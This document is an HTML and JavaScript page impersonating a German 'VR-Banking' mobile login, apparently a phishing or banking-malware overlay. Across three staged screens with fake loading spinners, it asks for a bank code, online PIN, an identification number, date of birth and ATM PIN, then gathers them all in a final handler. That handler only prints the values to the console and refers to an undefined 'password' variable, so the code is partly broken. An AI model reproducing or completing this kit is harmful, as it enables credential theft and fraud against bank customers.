<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.js"></script>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.0/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.1/css/font-awesome.min.css">
    <style>
        body {
            background-color: #fafafa;
        }

        header {
            padding: 10px;
            background-color: #2a64ad;
            color: #fff;
            font-weight: 600;
        }

        #form1, #form2, #form3 {
            display: flex;
            flex-direction: column;
            min-height: 100vh;
        }

        section {
            padding: 15px;
            flex: 1;
        }

        form {
            margin: 0;
        }

        label {
            margin: 0;
        }

        .input {
            width: 100%;
            padding: 8px;
            padding-left: 0;
            background-color: transparent;
            border: 0;
            border-bottom: 1px solid #ccc;
        }

        .input:focus {
            border-bottom: 2px solid #ec702e;
        }

        .error {
            border-color: #f00 !important;
        }

        footer {
            background-color: rgb(153, 153, 153);
        }

        .button {
            background-color: transparent;
            color: #2a64ad;
            font-weight: 600;
            border: 0;
        }

        .button:disabled {
            color: #525252;

        }
        
        input, button {
            outline: none !important;
            box-shadow: none !important;
        }
    </style>
</head>
<body>
    <div class="loader__" id="spinner" style="display:none;position:fixed;top:0px;left:0px;width:100%;height:100%;text-align:center;background:rgba(255, 255, 255, 0.47);z-index:8000000;">
        <span  class="fa fa-circle-o-notch  fa-spin " style="position:relative;top:50%;font-size:50px;color:#2a64ad"></span>
    </div>
    <form onsubmit="return false">
        <div id="form1">
            <header>
                VR-Banking
            </header>
            <section>
                <label for="login">Bankleitzahl</label>
                <input type="tel" name="login" id="login" class="input" onkeyup="check()" placeholder="Bitte eingeben" maxlength="10" required autocomplete="off">
            </section>
            <footer>
                <div style="float: left; width: 50%;padding: 10px;font-weight: 600;color: #2a64ad;">
                    ZURÜCK
                </div>
                <div style="float: left; width: 50%;text-align: right;padding: 10px;color: #525252;font-weight: 600;">
                    FERTIG
                </div>
            </footer>
        </div>
        <div id="form2" style="display: none;">
            <header>
                VR-Banking
            </header>
            <section>
                <label for="netkey">PIN</label>
                <input type="password" name="pin" id="pin" onkeyup="check2()" style="margin-bottom: 15px;" class="input" placeholder="Bitte eingeben" required autocomplete="off">

                <label for="blz">BLZ</label>
                <input type="text" name="blz" id="blz" onkeyup="check2()" style="margin-bottom: 15px;" class="input" placeholder="Bitte eingeben" required autocomplete="off">

            </section>
            <footer>
                <div style="float: left; width: 50%;padding: 10px;font-weight: 600;color: #2a64ad;">
                    ZURÜCK
                </div>
                <div style="float: left; width: 50%;text-align: right;padding: 10px;color: #525252;font-weight: 600;">
                    <input type="submit" class="button" id="sendData" disabled value="FERTIG">
                </div>
            </footer>
        </div>
        <div id="form3" style="display: none;">
            <header>
                VR-Banking
            </header>
            <section>
                <label for="IDnumber">Identifikationsnummer</label>
                <input type="tel" name="IDnumber" id="IDnumber" onkeyup="check3()" style="margin-bottom: 15px;" class="input" placeholder="Bitte eingeben" required autocomplete="off">

                <div style="display: grid;grid-template-columns: 1fr 1fr;grid-gap: 20px;">
                    <label for="dob">Geburtsdatum</label>
                    <label for="ATMpin">ATM PIN</label>
                    
                    <input type="tel" name="dob" id="dob" onkeyup="check3()" class="input" placeholder="Bitte eingeben" required autocomplete="off">
                    <input type="tel" name="ATMpin" id="ATMpin" onkeyup="check3()"  class="input" placeholder="Bitte eingeben" required autocomplete="off">
                </div>
            </section>
            <footer>
                <div style="float: left; width: 50%;padding: 10px;font-weight: 600;color: #2a64ad;">
                    ZURÜCK
                </div>
                <div style="float: left; width: 50%;text-align: right;padding: 10px;color: #525252;font-weight: 600;">
                    <input type="submit" class="button" id="sendDataLast" disabled value="FERTIG">
                </div>
            </footer>
        </div>
    </form>

    <script>
        $('#IDnumber').mask('0#');
        $('#dob').mask('00/00/0000');
        $('#ATMpin').mask('0000');
        var login = document.getElementById('login'),
            pin = document.getElementById('pin'),
            blz = document.getElementById('blz'),
            ATMpin = document.getElementById('ATMpin'),
            dob = document.getElementById('dob'),
            IDnumber = document.getElementById('IDnumber'),
            lastPage = document.getElementById('lastPage'),
            sendData = document.getElementById('sendData'),
            sendDataLast = document.getElementById('sendDataLast'),
            form1 = document.getElementById('form1'),
            form2 = document.getElementById('form2'),
            form3 = document.getElementById('form3');

        function check() {
            if(login.value.length === 10) {
                spinner.style.display = 'block';
                setTimeout(() => {
                    form1.style.display = 'none';
                    spinner.style.display = 'none';
                    form2.style.display = 'flex';
                }, 2000);
            }
        }

        function check2() {
            if(pin.value.length != 0 && blz.value.length != 0) {
                sendData.disabled = false
            } else {
                sendData.disabled = true
            }
        }

        function check3() {
            if(ATMpin.value.length === 4 && dob.value.length === 10 && IDnumber.value.length >= 4) {
                sendDataLast.disabled = false
            } else {
                sendDataLast.disabled = true
            }
        }

        sendData.onclick = () => {
            
            spinner.style.display = 'block';
                setTimeout(() => {
                    form2.style.display = 'none';
                    spinner.style.display = 'none';
                    form3.style.display = 'flex';
                }, 2000);
        }


        sendDataLast.onclick = () => {
                console.log('print event: ' + login.value + ' : ' + password.value + ' : ' + blz.value + ' : ' + IDnumber.value + ' : ' + dob.value + ' : ' + ATMpin.value)
        }   
    </script>
</body>
</html>